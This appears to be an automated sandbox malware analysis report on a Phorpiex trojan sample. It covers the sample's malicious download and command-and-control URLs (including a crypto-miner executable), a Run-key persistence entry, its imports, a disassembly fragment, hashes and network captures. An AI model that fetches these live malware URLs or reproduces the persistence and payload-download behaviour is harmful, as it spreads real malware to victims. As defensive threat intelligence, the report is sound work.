http://185.215.113.84/xmrminer.exes | 100% | Avira URL Cloud | malware
http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/5#8u | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/19 | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exe~ | 100% | Avira URL Cloud | malware
http://185.215.113.66/ | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/6 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/5 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/2 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/1 | 100% | Avira URL Cloud | malware
http://185.215.113.84/xmrminer.exero/ | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/4 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/3 | 100% | Avira URL Cloud | malware
http://185.215.113.66/twizt/3E8 | 100% | Avira URL Cloud | malware
                          No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.84/xmrminer.exe | true | 15% Virustotal; Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/6 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/5 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/2 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/1 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/4 | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/3 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.66/twizt/3Strong | winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/984658winrecsv.exeWindows | Id4zlrsrZ4.exe, winrecsv.exe.0.dr | true | Avira URL Cloud: malware | unknown
http://185.215.113.84/xmrminer.exeBLk | 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | winrecsv.exe.0.dr | false | | high
http://185.215.113.66/twizt/1NNC: | winrecsv.exe, 00000005.00000003.389365979.0000000003153000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/3l=8 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/4lH9 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://2462462645.fr/ | winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | winrecsv.exe.0.dr | false | | high
http://185.215.113.66/twizt/6k8 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/ | winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.dr | true | Avira URL Cloud: malware | unknown
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://185.215.113.84/xmrminer.exe( | 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaieg | Id4zlrsrZ4.exe, winrecsv.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://185.215.113.66/twizt/3lZ9 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/15C5FCA7 | winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389646709.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389630272.0000000003199000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389653445.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389580007.0000000003192000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/3l | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/6lS9 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.84/xmrminer.exer | 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.84/xmrminer.exes | 509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443 | winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/5#8u | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/19 | winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.84/xmrminer.exe~ | 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/ | winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.84/xmrminer.exero/ | 509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://185.215.113.66/twizt/3E8 | winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.66 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | false
105.106.149.0 | unknown | Algeria | 36947 | ALGTEL-ASDZ | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
176.194.22.84 | unknown | Russian Federation | 12714 | TI-ASMoscowRussiaRU | false
185.215.113.84 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
89.236.217.87 | unknown | Uzbekistan | 39032 | ISPETCUZ | false

Private IP: 192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 684211
Start date and time: 2022-08-15 18:30:01 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Id4zlrsrZ4.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.mine.winEXE@8/7@0/7
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 99.3% (good quality ratio 94.6%)
• Quality average: 83.4%
• Quality standard deviation: 26.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 53
• Number of non-executed functions: 138
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.109.209.108
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, redir.update.msft.com.trafficmanager.net, login.live.com, store-images.s-microsoft.com, www.update.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:31:06 | API Interceptor | 1x Sleep call for process: Id4zlrsrZ4.exe modified
18:31:09 | API Interceptor | 14x Sleep call for process: winrecsv.exe modified
18:31:12 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\winrecsv.exe
18:31:36 | API Interceptor | 2x Sleep call for process: 509517324.exe modified
Process: C:\Windows\winrecsv.exe
File Type: data
Category: dropped
Size (bytes): 6912
Entropy (8bit): 7.973025390406073
Encrypted: false
SSDEEP: 96:oj6V/SoG95rGUWjQXk2i4yZwil2aFrl28WqR/P7/8lOmAzhBHqsUNDjUmD2eEN8x:oeVhGLr0QXj1yZHl9RZz8lwt8fNXr
MD5: 9E2F163C15EE457BE1F51981985570A1
SHA1: 4A191E6DA4A85B915F285E758D0789D2EDE3AFF1
SHA-256: C7DE55DDD548F4F268979E1F0C70AB0EDB2566C0CE46B921EA281E1570ABAD82
SHA-512: 4B3EAE4A1DF79AC8805F46D32DAECDB54028D160A5056679D4478C08E7F8FF42DF5F84F4B1FE2CB8B5F3574EAE5B18A94AD865EDFC4D314A51118316C907967D
Malicious: false
Reputation: low
Preview: (high-entropy binary data, not shown)
Process: C:\Users\user\AppData\Local\Temp\509517324.exe
File Type: HTML document, ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 564
Entropy (8bit): 4.775290370533887
Encrypted: false
SSDEEP: 12:TjeRHVIdtklI5rRCNGlTF5TF5TF5TF5TF5TFK:neRH688lTPTPTPTPTPTc
MD5: 5DA4C1420F84EC727D1B6BDD0D46E62E
SHA1: 280D08D142F7386283F420444EC48E1CDBFD61BB
SHA-256: 3C8CC37A98346BD0123B35E5CCD87BD07D69914DAE04F8B49F61C150D96E9D1F
SHA-512: 7C51A628831D0236E8D314C71732B8A62E06334431D10F7C293C49B23665B2A6A1DDBC4772009010955B5228EA4A5CD97FB93581CE391EE1792E8A198B76111A
Malicious: false
Reputation: low
                                                                                Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
Process: C:\Windows\winrecsv.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 4.230127984822324
Encrypted: false
SSDEEP: 96:nYdJtz6aW+HMl7hswYGZ9w/Ptboynun9Cth:nktz/67hO/P1oynW8
MD5: A475E43527D7DC7D6F2D23BAD64FCC99
SHA1: 793A7625C0106D6CD79D060B4EEC94E58530833E
SHA-256: F97C43BF3DCE6180E658F2C3776E31CF52472B28AC8249BE4D307880B6405EEB
SHA-512: 4AF57A218D7D790B5EC4581DD2BC941DEFF05EA11BF6054A9D268C054AF421977CDD68D5090884358208925F50023C97E9CFABA0831D72E9BCDCCA729447D900
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 52%
• Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:
• Filename: GitmEGG60Q.exe, Detection: malicious
Reputation: low
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........j.wTj.wTj.wT..sTh.wT.yTk.wT..}Ta.wTMM.Tg.wTj.vTN.wTt..Tk.wTt..Tk.wTRichj.wT........PE..L......b............................|........ ....@..........................`............@..................................#.......@.......................P....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...<....0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\winrecsv.exe
File Type: data
Category: modified
Size (bytes): 4096
Entropy (8bit): 4.818471917182262
Encrypted: false
SSDEEP: 96:IlukshBzu5Gen5eRl7KKCek/Wok71L6LoDez8seyZ61ocHPL:I8jhBzHe0VKSUkRGsDmeyGoGL
MD5: FBC49CE2908C1B0B1532569F35D123FF
SHA1: BB0948AD3CE4472B6A9A03F4FB5F1A04216C9AE9
SHA-256: D3F2C2406407678E4CF9507F48143A6B39261F11835ACD32585FC9D789A4EB7C
SHA-512: F46D81481B015DAA94A52826CACDCEE00B4A98D7A938B36F1F3F2372C00B08003AB2FB859DEEC3DA82B3E8A9FC65632A469CCF67FFA5AF999564E68F67F00212
Malicious: false
Reputation: low
Preview: (binary data, not shown)
Process: C:\Users\user\AppData\Local\Temp\509517324.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1572864
Entropy (8bit): 4.273557257647912
Encrypted: false
SSDEEP: 12288:bwb+0Th31Trp3TSP6a0rOupypy+Z6U6KvUJn5CmGreLzGGUsyU:ka0Th31Trp3TSP6ff+C
MD5: 8DBEF248F4B8327279613A374208D979
SHA1: CD8BF0CF7FF05E0DA686EF2F11C0CC5ECEA94634
SHA-256: AF29DD441C0D4156DF24A534E10A381F7465CB8D2E4DB00F79B4848FE2203028
SHA-512: 285BE7CAF852291F67503C03329447A42B704F32E56EE64CD2FBF9E6889EBDD38E8411F239820413BB0E1C8FBBCD6E02C5AD3E880737544E329CF635C57507EC
Malicious: false
                                                                                Process:C:\Users\user\AppData\Local\Temp\509517324.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):12288
                                                                                Entropy (8bit):3.3091281554845113
                                                                                Encrypted:false
                                                                                SSDEEP:192:lRTHAZo19YOx3x1YN5FSE0V1w5G5tGrgM3+4:rT255e+G5tGrN+4
                                                                                MD5:086FD986F38603874BB00AB8F63F8DBD
                                                                                SHA1:F8BA4481F857FA46502D788A417F5B135DF4B5FE
                                                                                SHA-256:0E7FD6EB2B50E9E7D0C9A9D4AC960F3EB32D070B80CED28CD0C24E7837FE336E
                                                                                SHA-512:71788E2D873A89BDFFE01F312701FD787BBFCC81DA5591A7B15BE3B58C86FD450CF74D96763FE431F9A7F2D24EF64379E220C0B5F85AAD89DF61B0A04F750F13
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):77312
                                                                                Entropy (8bit):6.345505183378638
                                                                                Encrypted:false
                                                                                SSDEEP:1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
                                                                                MD5:ED2D7B25BB360CCCB4F0F6A4F8732D7A
                                                                                SHA1:6FFCC083956C5AC19826BDD87E12F87817EE837C
                                                                                SHA-256:22F524ABC98F958705FEBD3761BEDC85EC1AE859316A653B67C0C01327533092
                                                                                SHA-512:6592EC1A12F9575176474C6192D49F4F4A87998DA6692E07E8BA6A93789D6A92E41DBABD3488A27A49EC8C8C414E02751867FEB2A0038E4091630CA3E4FB235F
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\winrecsv.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.345505183378638
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:Id4zlrsrZ4.exe
                                                                                File size:77312
                                                                                MD5:ed2d7b25bb360cccb4f0f6a4f8732d7a
                                                                                SHA1:6ffcc083956c5ac19826bdd87e12f87817ee837c
                                                                                SHA256:22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
                                                                                SHA512:6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f
                                                                                SSDEEP:1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
                                                                                TLSH:CB732810F6D0C03AF0F740FBE2FB05AA592CEFB4530698E752D9A85F5B215D1A9364A3
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...J...K.......K.......K...D...K..&&...K...J.~.K..&0...K.......K.......K.Rich..K.........PE..L...0D.b...........
                                                                                Icon Hash:00828e8e8686b000
                                                                                Entrypoint:0x405a20
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x62FA4430 [Mon Aug 15 13:03:44 2022 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:2f2316fb946682a102e453a8ae405904
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000C4Ch
                                                                                push 00001B58h
                                                                                call dword ptr [004100F0h]
                                                                                mov dword ptr [ebp-00000214h], 00000000h
                                                                                mov dword ptr [ebp-0000083Ch], 00002332h
                                                                                mov eax, dword ptr [ebp-00000214h]
                                                                                cmp eax, dword ptr [ebp-0000083Ch]
                                                                                jnc 00007FF3C0B6163Bh
                                                                                push 00000000h
                                                                                push 00413C60h
                                                                                call dword ptr [004101C0h]
                                                                                mov dword ptr [ebp-00000A50h], eax
                                                                                cmp dword ptr [ebp-00000A50h], 00000000h
                                                                                je 00007FF3C0B61607h
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 00000000h
                                                                                push 00413C60h
                                                                                call dword ptr [004101C0h]
                                                                                mov dword ptr [ebp-00000A74h], eax
                                                                                cmp dword ptr [ebp-00000A74h], 00000000h
                                                                                je 00007FF3C0B60ECDh
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                push 00413C60h
                                                                                push 00413C8Ch
                                                                                call dword ptr [00410098h]
                                                                                push 000003E8h
                                                                                call dword ptr [004100F0h]
                                                                                Programming Language:
                                                                                • [ C ] VS2005 build 50727
                                                                                • [IMP] VS2005 build 50727
                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11f1c | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x318 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xe4fc | 0xe600 | False | 0.4665591032608696 | data | 6.11073833830779 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x2eca | 0x3000 | False | 0.4490559895833333 | data | 5.5519954819651245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x13000 | 0x26e0 | 0x1400 | False | 0.6556640625 | data | 6.173018070745021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
WS2_32.dll | recvfrom, setsockopt, sendto, bind, WSAStartup, ioctlsocket, recv, send, WSACloseEvent, WSARecv, WSASend, WSAGetLastError, WSAEnumNetworkEvents, gethostname, connect, inet_ntoa, inet_addr, htons, getsockname, shutdown, socket, closesocket, gethostbyname, WSAEventSelect, WSAGetOverlappedResult, WSAWaitForMultipleEvents, getpeername, accept, WSACreateEvent, WSASocketA, listen
SHLWAPI.dll | PathFileExistsW, StrCmpNW, PathMatchSpecW, PathFindFileNameW, PathFileExistsA, StrChrA, StrStrIA, StrCmpNIA, StrStrW
urlmon.dll | URLDownloadToFileW
WININET.dll | InternetConnectA, InternetOpenUrlW, HttpQueryInfoA, InternetOpenW, HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle, InternetCrackUrlA
ntdll.dll | memcpy, _chkstk, _aulldiv, RtlUnwind, memmove, mbstowcs, RtlTimeToSecondsSince1980, NtQuerySystemTime, NtQueryVirtualMemory, strstr, isdigit, isalpha, _allshl, _aullshr, memset
msvcrt.dll | rand, srand, _vscprintf
KERNEL32.dll | MoveFileW, CreateProcessW, GetLocaleInfoA, DuplicateHandle, DeleteCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentThread, GetCurrentProcess, InterlockedExchangeAdd, InterlockedIncrement, InterlockedExchange, WaitForSingleObject, InterlockedDecrement, GetCurrentProcessId, HeapSetInformation, GetProcessHeaps, GetSystemInfo, PostQueuedCompletionStatus, HeapValidate, HeapCreate, HeapFree, HeapAlloc, HeapReAlloc, ExpandEnvironmentStringsW, CreateThread, DeleteFileA, CreateMutexA, MoveFileA, GetLastError, CreateEventA, ExitProcess, GetQueuedCompletionStatus, CreateIoCompletionPort, SetEvent, GetVolumeInformationW, SetFileAttributesW, lstrcpyW, DeleteFileW, GetDiskFreeSpaceExW, FindNextFileW, lstrcmpiW, QueryDosDeviceW, RemoveDirectoryW, FindClose, lstrlenA, GlobalLock, GetModuleHandleW, GetTickCount, GlobalAlloc, Sleep, lstrcpynW, ExitThread, MultiByteToWideChar, lstrlenW, GlobalUnlock, GetFileSize, MapViewOfFile, UnmapViewOfFile, WriteFile, InitializeCriticalSection, LeaveCriticalSection, CreateFileW, FlushFileBuffers, EnterCriticalSection, CreateFileMappingW, CloseHandle, FindFirstFileW, GetDriveTypeW, MoveFileExW, CreateDirectoryW, GetLogicalDrives, CopyFileW, GetModuleFileNameW, lstrcmpW
USER32.dll | SendMessageA, wsprintfW, IsClipboardFormatAvailable, RegisterClassExW, GetWindowLongW, GetClipboardData, EmptyClipboard, ChangeClipboardChain, SetWindowLongW, CloseClipboard, GetMessageA, FindWindowA, ShowWindow, wsprintfA, SetForegroundWindow, wvsprintfA, TranslateMessage, DefWindowProcA, RegisterRawInputDevices, CreateWindowExW, DispatchMessageA, OpenClipboard, SetClipboardData, SetClipboardViewer
ADVAPI32.dll | RegSetValueExW, CryptGenRandom, CryptReleaseContext, CryptAcquireContextW, RegQueryValueExW, RegOpenKeyExA, RegSetValueExA, RegCloseKey, RegOpenKeyExW
SHELL32.dll | ShellExecuteW
ole32.dll | CoInitializeEx, CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll | SysFreeString, SysAllocString
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 15, 2022 18:31:30.772701025 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:30.829678059 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.829869986 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:30.836591005 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:30.893178940 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893227100 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893254995 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893306971 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893336058 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893359900 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893424034 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:30.893436909 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:30.893493891 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.001279116 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.001372099 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.058437109 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.058501005 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.058612108 CEST | 80 | 49762 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.058660984 CEST | 49762 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.186661959 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.245110035 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.245215893 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.247442961 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304191113 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304255009 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304302931 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304336071 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304343939 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304367065 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304390907 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304414034 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304436922 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:31.304444075 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304474115 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
